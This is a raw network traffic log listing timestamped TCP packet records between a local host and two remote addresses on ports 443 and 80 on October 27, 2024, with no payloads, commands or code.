                                                                                                Oct 27, 2024 17:11:43.549591064 CET57945443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:43.549597025 CET4435794513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:43.551328897 CET57952443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:43.551415920 CET4435795213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:43.551505089 CET57952443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:43.551600933 CET57952443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:43.551634073 CET4435795213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.290601969 CET8057947152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.290709972 CET5794780192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:44.318298101 CET4435794813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.318829060 CET57948443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.318861008 CET4435794813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.319288969 CET57948443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.319302082 CET4435794813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.322298050 CET4435795213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.322630882 CET57952443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.322689056 CET4435795213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.322967052 CET57952443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.322983027 CET4435795213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.325930119 CET4435795013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.326205015 CET57950443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.326220989 CET4435795013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.326514959 CET57950443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.326524973 CET4435795013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.326966047 CET4435794913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.327212095 CET57949443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.327236891 CET4435794913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.327548027 CET57949443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.327555895 CET4435794913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.330215931 CET4435795113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.330487967 CET57951443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.330499887 CET4435795113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.330807924 CET57951443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.330815077 CET4435795113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.448479891 CET4435794813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.448584080 CET4435794813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.448637962 CET57948443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.448765993 CET57948443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.448765993 CET57948443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.448792934 CET4435794813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.448817968 CET4435794813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.451330900 CET57953443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.451361895 CET4435795313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.451430082 CET57953443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.451570034 CET57953443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.451581955 CET4435795313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.453385115 CET4435795213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.453545094 CET4435795213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.453612089 CET57952443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.453664064 CET57952443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.453664064 CET57952443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.453696012 CET4435795213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.453717947 CET4435795213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.455425024 CET57954443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.455470085 CET4435795413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.455544949 CET57954443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.455645084 CET57954443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.455672979 CET4435795413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.457329988 CET4435795013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.457376957 CET4435795013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.457428932 CET4435795013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.457429886 CET57950443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.457482100 CET57950443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.457515001 CET57950443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.457515001 CET57950443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.457530022 CET4435795013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.457549095 CET4435795013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.458278894 CET4435795113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.458425045 CET4435795113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.458481073 CET57951443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.458596945 CET57951443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.458616018 CET4435795113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.458630085 CET57951443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.458636999 CET4435795113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.459673882 CET57955443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.459681988 CET4435795513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.459733963 CET57955443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.459912062 CET57955443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.459920883 CET4435795513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.460798979 CET57956443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.460827112 CET4435795613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.460880995 CET57956443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.460993052 CET57956443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.461004972 CET4435795613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.464705944 CET4435794913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.464835882 CET4435794913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.464891911 CET57949443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.464910030 CET57949443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.464916945 CET4435794913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.464929104 CET57949443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.464934111 CET4435794913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.466536045 CET57957443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.466636896 CET4435795713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:44.466722965 CET57957443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.466835976 CET57957443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:44.466871023 CET4435795713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.173347950 CET4435795313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.174150944 CET57953443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.174175024 CET4435795313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.174592018 CET57953443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.174595118 CET4435795313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.198671103 CET4435795613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.199090004 CET57956443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.199160099 CET4435795613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.199419022 CET57956443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.199433088 CET4435795613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.203738928 CET4435795713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.204020023 CET57957443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.204046011 CET4435795713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.204173088 CET4435795513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.204293013 CET57957443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.204299927 CET4435795713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.204463959 CET57955443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.204476118 CET4435795513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.204731941 CET57955443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.204735994 CET4435795513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.208888054 CET4435795413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.209146976 CET57954443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.209178925 CET4435795413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.209431887 CET57954443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.209445000 CET4435795413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.302752972 CET4435795313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.302814007 CET4435795313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.302901030 CET57953443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.303395033 CET57953443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.303404093 CET4435795313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.303442955 CET57953443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.303448915 CET4435795313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.305728912 CET57958443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.305773020 CET4435795813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.305883884 CET57958443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.305975914 CET57958443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.305989981 CET4435795813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.328499079 CET4435795613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.328586102 CET4435795613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.328665018 CET57956443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.328896999 CET57956443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.328922987 CET4435795613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.328948975 CET57956443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.328963995 CET4435795613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.331533909 CET57959443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.331593990 CET4435795913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.331708908 CET57959443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.331821918 CET57959443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.331855059 CET4435795913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.333591938 CET4435795513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.333646059 CET4435795513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.333693981 CET57955443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.333832026 CET57955443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.333837986 CET4435795513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.333868027 CET57955443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.333872080 CET4435795513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.335448027 CET4435795713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.335561991 CET4435795713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.335638046 CET57957443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.335638046 CET57957443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.335678101 CET57957443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.335695982 CET4435795713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.336098909 CET57960443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.336183071 CET4435796013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.336278915 CET57960443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.336410046 CET57960443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.336443901 CET4435796013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.338104010 CET57961443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.338134050 CET4435796113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.338217020 CET57961443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.338361025 CET57961443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.338373899 CET4435796113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.343216896 CET4435795413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.343286037 CET4435795413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.343346119 CET57954443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.343497038 CET57954443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.343525887 CET4435795413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.343554020 CET57954443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.343569040 CET4435795413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.345859051 CET57962443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.345881939 CET4435796213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.345985889 CET57962443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.346115112 CET57962443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:45.346139908 CET4435796213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:45.913652897 CET5794780192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:45.914052963 CET5796380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:46.126230955 CET8057963152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.126348972 CET5796380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:46.126533031 CET5796380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:46.134403944 CET8057947152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.134488106 CET5794780192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:46.138161898 CET8057963152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.259619951 CET4435796213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.260024071 CET57962443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.260065079 CET4435796213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.260302067 CET4435796113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.260520935 CET57962443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.260550976 CET4435796213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.260719061 CET57961443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.260732889 CET4435796113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.261020899 CET57961443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.261024952 CET4435796113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.261552095 CET4435795813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.261965036 CET57958443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.261995077 CET4435795813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.262489080 CET57958443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.262500048 CET4435795813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.262631893 CET4435795913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.262936115 CET57959443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.262984037 CET4435795913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.263406992 CET57959443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.263420105 CET4435795913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.265510082 CET4435796013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.265815973 CET57960443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.265831947 CET4435796013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.266280890 CET57960443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.266290903 CET4435796013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.389791965 CET4435795813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.389827967 CET4435795813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.389904022 CET4435795813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.389909983 CET57958443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.389970064 CET57958443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.390153885 CET57958443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.390182972 CET4435795813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.390208006 CET57958443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.390219927 CET4435795813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.390700102 CET4435796113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.390759945 CET4435796113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.390810966 CET57961443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.391592979 CET57961443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.391608000 CET4435796113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.391619921 CET57961443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.391624928 CET4435796113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.393368006 CET4435796013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.393435001 CET4435796013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.393500090 CET57960443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.393532038 CET4435796013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.393563032 CET4435796013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.393616915 CET57960443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.393908024 CET57964443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.393966913 CET4435796413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.394051075 CET57964443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.394421101 CET57965443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.394455910 CET4435796513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.394515991 CET57965443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.394615889 CET57960443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.394648075 CET4435796013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.394674063 CET57960443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.394690037 CET4435796013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.395673990 CET57964443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.395704985 CET4435796413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.395855904 CET4435795913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.395904064 CET57965443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.395920992 CET4435796513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.396080971 CET4435795913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.396137953 CET57959443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.396624088 CET4435796213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.396852016 CET4435796213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.396902084 CET4435796213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.396905899 CET57962443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.396960020 CET57962443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.397012949 CET57962443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.397012949 CET57962443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.397030115 CET4435796213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.397049904 CET4435796213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.397593975 CET57966443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.397614956 CET4435796613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.397684097 CET57966443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.397739887 CET57959443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.397774935 CET4435795913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.397806883 CET57959443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.397818089 CET57966443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.397836924 CET4435795913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.397842884 CET4435796613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.400651932 CET57967443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.400664091 CET4435796713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.400737047 CET57967443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.400918961 CET57967443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.400932074 CET4435796713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.401521921 CET57968443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.401540995 CET4435796813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:46.401598930 CET57968443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.401700020 CET57968443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:46.401711941 CET4435796813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.035291910 CET8057963152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.037868023 CET5796380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:47.133800030 CET4435796813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.135401011 CET57968443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.135427952 CET4435796813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.135788918 CET4435796513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.136013985 CET57968443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.136019945 CET4435796813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.136219978 CET57965443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.136240959 CET4435796513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.136688948 CET57965443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.136694908 CET4435796513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.137343884 CET4435796613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.137737036 CET57966443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.137784004 CET4435796613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.138123989 CET57966443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.138138056 CET4435796613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.141805887 CET4435796413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.143131018 CET57964443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.143147945 CET4435796413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.143621922 CET57964443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.143631935 CET4435796413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.152368069 CET4435796713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.155201912 CET57967443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.155210972 CET4435796713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.155570030 CET57967443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.155581951 CET4435796713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.264617920 CET4435796813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.264650106 CET4435796813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.264702082 CET4435796813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.264760017 CET57968443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.264916897 CET57968443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.264916897 CET57968443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.266895056 CET4435796613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.266913891 CET57968443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.266923904 CET4435796813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.267292976 CET4435796513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.267298937 CET4435796613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.267369032 CET57966443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.267395020 CET4435796513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.267420053 CET57966443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.267420053 CET57966443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.267448902 CET4435796613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.267474890 CET4435796613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.267507076 CET57965443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.267765045 CET57969443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.267831087 CET4435796913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:47.267890930 CET57965443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:47.267905951 CET4435796513.107.246.51192.168.2.4
